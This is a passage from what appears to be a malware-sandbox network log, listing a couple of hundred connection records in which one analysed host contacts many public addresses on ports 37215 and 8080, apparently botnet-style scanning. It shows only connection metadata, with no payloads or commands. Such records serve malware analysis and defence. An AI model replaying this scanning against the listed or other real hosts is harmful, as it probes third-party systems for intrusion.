                                                        24336192.168.2.2353882157.90.241.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24337192.168.2.2355482157.17.42.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24338192.168.2.2347092197.76.17.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24339192.168.2.2342992197.77.144.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24340192.168.2.2338228188.170.82.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24341192.168.2.2338242142.175.28.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24342192.168.2.235362020.179.200.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24343192.168.2.235167241.233.66.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24344192.168.2.2334842153.242.177.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24345192.168.2.2349542156.205.75.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24346192.168.2.2353512144.37.43.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24347192.168.2.2360142208.243.89.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24348192.168.2.23366861.125.237.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24349192.168.2.2353664187.74.128.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24350192.168.2.2335900169.149.135.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24351192.168.2.2350068173.231.217.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24352192.168.2.2345362223.187.12.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24353192.168.2.2353154219.92.216.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24354192.168.2.2333582203.225.44.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24355192.168.2.233384651.10.80.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24356192.168.2.234211637.54.26.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24357192.168.2.23565182.242.216.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24358192.168.2.2343284121.175.217.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24359192.168.2.2342426131.0.181.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24360192.168.2.2345016200.249.103.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24361192.168.2.2342854158.182.196.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24362192.168.2.2354512172.118.124.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24363192.168.2.2349660195.80.51.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24364192.168.2.2335976198.87.180.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24365192.168.2.2344568121.123.255.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24366192.168.2.2354030110.25.99.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24367192.168.2.2347424161.56.217.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24368192.168.2.2359434209.96.92.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24369192.168.2.2348856151.190.196.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24370192.168.2.2339574176.73.247.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24371192.168.2.2354902190.92.54.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24372192.168.2.233852618.15.10.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24373192.168.2.2353926167.145.73.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24374192.168.2.23382542.191.204.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24375192.168.2.2357126151.166.193.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24376192.168.2.2334584139.70.87.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24377192.168.2.234412690.24.0.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24378192.168.2.235859614.231.8.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24379192.168.2.2343296142.172.46.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24380192.168.2.2350164166.130.67.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24381192.168.2.2352244177.124.238.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24382192.168.2.234319440.244.255.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24383192.168.2.233472278.250.29.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24384192.168.2.2340748126.89.96.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24385192.168.2.2350588208.212.42.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24386192.168.2.2340150103.144.68.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24387192.168.2.233645653.223.231.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24388192.168.2.233634232.43.88.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24389192.168.2.2345598169.173.158.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24390192.168.2.233824876.201.8.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24391192.168.2.233676045.191.210.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24392192.168.2.236028678.201.204.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24393192.168.2.235420899.142.181.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24394192.168.2.234049231.84.202.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24395192.168.2.235086066.171.94.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24396192.168.2.2344674122.16.93.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24397192.168.2.2335918209.58.33.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24398192.168.2.234920085.72.252.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24399192.168.2.23417748.255.106.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24400192.168.2.235308683.248.208.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24401192.168.2.234898453.14.4.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24402192.168.2.233298257.250.247.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24403192.168.2.2334596197.236.55.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24404192.168.2.235702882.150.6.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24405192.168.2.235502869.174.42.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24406192.168.2.233403869.192.238.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24407192.168.2.2345092140.52.36.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24408192.168.2.2342576155.3.42.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24409192.168.2.2352622212.44.255.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24410192.168.2.235599662.14.158.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24411192.168.2.2340160176.64.170.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24412192.168.2.235342262.114.126.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24413192.168.2.2354292106.158.186.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24414192.168.2.234824614.113.213.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24415192.168.2.2348352185.251.159.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24416192.168.2.2355620100.201.199.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24417192.168.2.2340732177.188.127.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24418192.168.2.234482257.160.186.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24419192.168.2.234895687.224.143.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24420192.168.2.235301649.225.113.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24421192.168.2.2334548120.132.199.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24422192.168.2.2353054139.173.228.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24423192.168.2.234821074.102.228.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24424192.168.2.235432025.131.51.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24425192.168.2.2335840165.215.95.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24426192.168.2.2333862167.196.0.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24427192.168.2.2340094149.20.14.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24428192.168.2.234448678.70.3.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24429192.168.2.2349960197.180.62.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24430192.168.2.235892450.92.85.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24431192.168.2.235397861.19.138.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24432192.168.2.2334552170.96.203.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24433192.168.2.2344674192.244.213.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24434192.168.2.2357686171.7.109.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24435192.168.2.2343078173.152.75.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24436192.168.2.2350724128.218.5.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24437192.168.2.2348000177.177.110.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24438192.168.2.235295040.21.86.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24439192.168.2.2339330102.15.246.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24440192.168.2.2344716178.148.16.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24441192.168.2.2346640182.22.3.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24442192.168.2.234210462.164.36.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24443192.168.2.2346404203.155.37.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24444192.168.2.233720461.241.183.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24445192.168.2.235014479.60.14.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24446192.168.2.2339768106.26.224.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24447192.168.2.2346242141.248.81.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24448192.168.2.2354372141.146.195.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24449192.168.2.2335684159.103.152.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24450192.168.2.234450027.129.180.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24451192.168.2.2360912169.217.18.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24452192.168.2.2337018170.48.131.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24453192.168.2.234554462.65.161.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24454192.168.2.2336342156.203.114.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24455192.168.2.234168899.157.239.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24456192.168.2.2335586125.5.204.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24457192.168.2.235717242.12.19.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24458192.168.2.234893468.239.65.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24459192.168.2.235153865.155.100.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24460192.168.2.233680020.148.77.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24461192.168.2.2333440115.200.159.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24462192.168.2.2351968152.142.182.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24463192.168.2.2339232219.111.76.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24464192.168.2.235859249.23.183.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24465192.168.2.234387067.186.24.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24466192.168.2.233880486.126.129.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24467192.168.2.234340244.39.86.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24468192.168.2.2357926176.46.156.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24469192.168.2.2358362115.244.207.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24470192.168.2.2349376122.59.18.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24471192.168.2.2349610113.10.18.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24472192.168.2.23339482.134.45.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24473192.168.2.235704898.75.100.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24474192.168.2.2337828149.255.51.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24475192.168.2.2338038103.15.195.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24476192.168.2.235825625.205.54.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24477192.168.2.234653671.235.165.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24478192.168.2.233494263.194.202.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24479192.168.2.2355762193.28.53.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24480192.168.2.2340280185.6.196.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24481192.168.2.2345090131.186.149.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24482192.168.2.2359332134.97.86.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24483192.168.2.234212071.207.232.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24484192.168.2.2353448199.193.21.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24485192.168.2.2346222163.123.139.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24486192.168.2.235817032.242.157.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24487192.168.2.2354934184.86.174.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24488192.168.2.234095681.171.123.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24489192.168.2.233514236.218.227.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24490192.168.2.2345868163.140.58.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24491192.168.2.2347378197.228.10.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24492192.168.2.2341120143.137.203.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24493192.168.2.234789296.115.175.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24494192.168.2.2342476159.183.149.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24495192.168.2.235850859.18.170.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24496192.168.2.2346102201.32.248.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24497192.168.2.2342786137.242.241.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24498192.168.2.2351608212.74.84.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24499192.168.2.2354490162.243.134.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24500192.168.2.2350864221.154.195.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24501192.168.2.2334988190.99.33.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24502192.168.2.2353304193.169.210.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24503192.168.2.2339052115.144.127.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24504192.168.2.233786646.39.134.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24505192.168.2.2358468192.211.165.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24506192.168.2.2340282113.169.44.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24507192.168.2.2346414132.135.73.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24508192.168.2.234939620.23.228.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24509192.168.2.235336424.131.50.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24510192.168.2.234451693.122.11.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24511192.168.2.236028085.179.25.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24512192.168.2.2336174166.14.249.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24513192.168.2.2333872154.101.145.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24514192.168.2.235940252.186.126.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24515192.168.2.235195494.204.246.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24516192.168.2.2349506217.184.220.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24517192.168.2.2352842207.106.143.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24518192.168.2.2347152128.194.15.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24519192.168.2.233493852.169.146.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24520192.168.2.2351022197.242.229.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24521192.168.2.2341192197.166.187.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24522192.168.2.2335100157.51.35.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24523192.168.2.233670841.101.24.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24524192.168.2.2358732157.213.168.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24525192.168.2.234508448.236.182.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24526192.168.2.2354274160.193.127.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24527192.168.2.2334822157.158.254.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24528192.168.2.2358732188.209.125.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24529192.168.2.2359098109.50.179.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24530192.168.2.235742641.130.74.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24531192.168.2.235454457.26.115.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24532192.168.2.2344064157.67.248.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24533192.168.2.2355504192.80.19.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24534192.168.2.2346928157.188.11.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24535192.168.2.235248641.72.90.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24536192.168.2.2346922140.212.150.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24537192.168.2.235677841.62.2.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24538192.168.2.2336026141.186.187.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24539192.168.2.2336552157.101.64.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24540192.168.2.2360572157.253.63.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24541192.168.2.2351140157.26.30.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24542192.168.2.2332998197.134.90.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24543192.168.2.2357792197.113.76.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24544192.168.2.2335638157.171.232.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24545192.168.2.235965069.153.94.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24546192.168.2.234671041.3.243.22537215
